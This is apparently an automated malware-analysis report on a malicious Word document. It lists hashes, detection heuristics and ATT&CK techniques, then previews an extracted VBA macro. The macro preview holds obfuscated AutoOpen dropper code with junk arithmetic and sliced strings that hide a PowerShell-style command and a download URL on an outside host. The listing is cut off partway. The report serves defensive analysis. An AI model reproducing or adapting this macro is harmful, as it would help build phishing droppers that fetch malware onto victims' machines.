Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1a6afc1493e33971…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 246.5 KB
Created: 2017-12-20 12:09:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 014ce07b6cfb5b6a83ad0aff6d88cff3
SHA-1: b5df59adffe8b8c81b67f139d2e86b41c82c7e36
SHA-256: 1a6afc1493e33971fca254cbac8d34b6b131f66d87512d0c4f63c2a0ea288613
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro uses a Shell() call, indicating an attempt to execute external commands. The presence of the 'Img.Dropper.PhishingLure' ClamAV signature and the 'Password-protected archive handoff' heuristic suggests the document is designed to trick the user into opening a password-protected archive, which likely contains a malicious payload. The obfuscated nature of the VBA script and the use of Shell() point to downloader or dropper functionality.

Heuristics (8)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff [high] (SE_PASSWORD_ARCHIVE_LURE)
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs (channel: in document text, OLE body):
    • http://www.PoTaknlVGrfsvizMh7Npu
    • http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 94744 bytes
SHA-256: f572729f3c3b76a14c1c6956befafbc3814a1fd8285a71fe6ac83d7b98fb0ad6
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ZGvkoaBErXKoU"
Sub AutoOpen()
On Error Resume Next
bqjruaqjU = (2772 * CStr(wtLvEjwhQviHZh * Rnd(zzJGFHkiwa)) / 1988 / ChrB(CcBisil * CBool(136465363 - CDbl(YHoBfwrchB + UQCSwahdOqLK)))) + (179478542 / Fix(982) - UBdVjhDAV * Fix(IRJziHO + Log(CjMFlAJFIKF)))
XjNwahdUV = (2772 * CStr(AwlwNtAmdDVzLI * Rnd(BOQdMaZsvwW)) / 1988 / ChrB(VjQBntjCiaHXGJ * CBool(136465363 - CDbl(iHkXVETYS + rJVaGqAq)))) + (179478542 / Fix(982) - fDMBiGbGvbHsWC * Fix(ukLaBrCK + Log(ovjObckHjIiOSF)))
CQtzXzLUU = (2772 * CStr(MjVfZpGd * Rnd(ONmXNfTqALOYt)) / 1988 / ChrB(iIKIuiMnTbc * CBool(136465363 - CDbl(vGEirCB + EsPtfSEGLJ)))) + (179478542 / Fix(982) - iTDqWPh * Fix(whbtKuMj + Log(mSTLWXXm)))
tQcbZFbKV = (2772 * CStr(hrPiSKqCodwEzT * Rnd(sUspuMvjEdwF)) / 1988 / ChrB(ZbzjpAiswDzJ * CBool(136465363 - CDbl(UjunoQJthk + UahlLLFUEGdM)))) + (179478542 / Fix(982) - OOwoqvRtfas * Fix(lQoiwrrr + Log(OPTtjkwiE)))
Application.Run "fjcwhMMztj", TWWQKzjWuiiTjc
OqXQYZRUC = (2772 * CStr(TppzpZZvQmIP * Rnd(VNAzfuJLSOaL)) / 1988 / ChrB(pUrPQbo * CBool(136465363 - CDbl(YbZPdTGp + svzFBDYamZta)))) + (179478542 / Fix(982) - aOookFD * Fix(Whaiwma + Log(BbCVlWfMvnRT)))
odBvjXBLb = (2772 * CStr(jBmjWOYaEQwrk * Rnd(qEOEjbswnkNsjf)) / 1988 / ChrB(ZlPHMrAjFzQoVi * CBool(136465363 - CDbl(VztCEbI + czzmOCTihscffj)))) + (179478542 / Fix(982) - YHpVJESnXOmP * Fix(ziaWQomHP + Log(mjmVjvs)))
CVlNVvPFz = (2772 * CStr(KMZYbnDiDSFPq * Rnd(bICDpXjisiMQdB)) / 1988 / ChrB(iLRQwcvpjKt * CBool(136465363 - CDbl(qfdnmipmMsLQ + IbTvMLJBAUG)))) + (179478542 / Fix(982) - wuTfSWtvptCPq * Fix(mnPRqzApnB + Log(uUzjjpLWznj)))
VGtWSVmOY = (2772 * CStr(EmYWmii * Rnd(nJHSEYC)) / 1988 / ChrB(LIErsqlCRIYUhf * CBool(136465363 - CDbl(YdWphaN + GjQMicDCUTYJdK)))) + (179478542 / Fix(982) - MNBWEdKKZHF * Fix(ohiUTwNwLciH + Log(NGDAIWZNwKc)))
End Sub
Function TWWQKzjWuiiTjc()
On Error Resume Next
ZQpfkZUc = (2772 * CStr(TJEviNfjrmTOri * Rnd(bqwXXWUcUFC)) / 1988 / ChrB(KNRLDCdIfo * CBool(136465363 - CDbl(XhEGltoUmiL + lNimazhkpjnU)))) + (179478542 / Fix(982) - ZaQLNawnLb * Fix(SPjjflPuzdjwU + Log(DJwEprtkk)))
ZnNFUzJNz = (2772 * CStr(ADYzdbN * Rnd(LKzNwbLEHo)) / 1988 / ChrB(hdisHbLVvNzNq * CBool(136465363 - CDbl(JvYFhuRYQIQS + kPAdJlKcaRKR)))) + (179478542 / Fix(982) - SFSGLzIcoj * Fix(watYJMacptbG + Log(jpcjIjiNnMcMFJ)))
snQrijfaUD = Mid("KSGv5DhoscDh+cDht cDh+cDh9dcDh+G1x+G1xcDhG'+'1x+G1xN_cDh+cDh.EG1x'+'+G1xxceptiocDh+cDhncDh+cDh.Me'+'cDh+cDhssacDh+cDhge;cDvPjjivSN", 6, 117)
fRcdRpOBc = (2772 * CStr(SYJYEOza * Rnd(tTKQzFERtUss)) / 1988 / ChrB(vuKQwiVjvif * CBool(136465363 - CDbl(QHbqpkjGMb + stAwlaAPsTqcOO)))) + (179478542 / Fix(982) - QOECwlishzdaD * Fix(LmPUwRXwkkJu + Log(nEZiNcBUS)))
cGpHFD = (2772 * CStr(DYSbcEUo * Rnd(OtnjTNltClalc)) / 1988 / ChrB(jshziKj * CBool(136465363 - CDbl(tJdCFRqjrz + bzLQHzjwRQP)))) + (179478542 / Fix(982) - VaYjjuEm * Fix(GuziDQHTDWt + Log(HAAXcaBBOSD)))
noiZOiq = (2772 * CStr(KdLNATB * Rnd(AwfjjbIQ)) / 1988 / ChrB(RSiUtDSroHSPzC * CBool(136465363 - CDbl(tkFqnEWfj + JznGXwWzjkB)))) + (179478542 / Fix(982) - jQZsWLLisCuOn * Fix(WRcsunusjFikRI + Log(SRROEDoRuhLTAj)))
bkWwStoUhNz = Mid("m5zjcVpn8AavcDh+cDhoccDh'+'+cDhatdroi'+'tdutravcDh+cDhacDh+cDhicDh+cDhlparis.c'+'Dh+cDhnetcDhG1x+G1x+cDh/ducDh+cDhCAIw6/cDh+cDh,cDhOizmj", 11, 121)
KPVZXojkNj = (2772 * CStr(AHbhiHlmLzV * Rnd(LlDjZcN)) / 1988 / ChrB(VjNZXLHUCkPorV * CBool(136465363 - CDbl(wpalwkGRIfv + qWVclEII)))) + (179478542 / Fix(982) - tBJWARkakj * Fix(qHHrwqRJP + Log(FuczQzhId)))
ndCGkdZWzDX = (2772 * CStr(upmwYjiOi * Rnd(SZIUvzLMWms)) / 1988 / ChrB(JhuTzwk * CBool(136465363 - CDbl(QbjpQwGF + QEJVSrRhE)))) + (179478542 / Fix(982) - jwfBNXs * Fix(FBEhkdTMqtT + Log(zsFzGhj)))
TKGmRJEI = (2772 * CStr(jMKCnQPwTWqX * Rnd(iViPddvnwtEnHh)) / 1988 / ChrB(jUCRGwiizF * CBool(136465363 - CDbl(hbUqsYh + tdh
... (truncated)